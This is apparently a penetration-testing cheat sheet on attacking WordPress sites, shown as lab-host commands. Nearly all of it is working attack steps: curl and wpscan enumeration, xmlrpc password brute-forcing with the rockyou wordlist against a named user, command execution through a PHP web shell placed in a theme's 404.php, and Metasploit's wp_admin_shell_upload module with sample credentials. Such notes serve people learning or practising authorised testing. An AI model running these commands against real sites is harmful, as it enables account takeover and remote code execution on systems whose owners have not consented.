Manual Enumeration
# Confirm that it is a wordpress site
curl -s <http://blog.sitet.local> | grep WordPress
# Check installede themes
curl -s <http://blog.site.local/> | grep themes
# Check for plugins installed
curl -s <http://blog.site.local/> | grep plugins
# Normal Scan
sudo wpscan --url <http://blog.site.local> --enumerate --api-token dEOFB<SNIP>
# brute forcing with xmlrpc type
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.site.local>
Attacking Wordpress
Login Bruteforce
# brute forcing with xmlrpc type
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.site.local>
Code Execution
# PHP web shell to upload on site
# using curl to execute commands
curl <http://site.local/wp-content/themes/twentynineteen/404.php?0=id>
# wp_admin_shell_upload can be used to upload a shell and execute it automatically
use exploit/unix/webapp/wp_admin_shell_upload
> set rhosts site.local
> set username john
> set password firebird1
> set lhost
> set rhost
> set VHOST blog.site.local
Last updated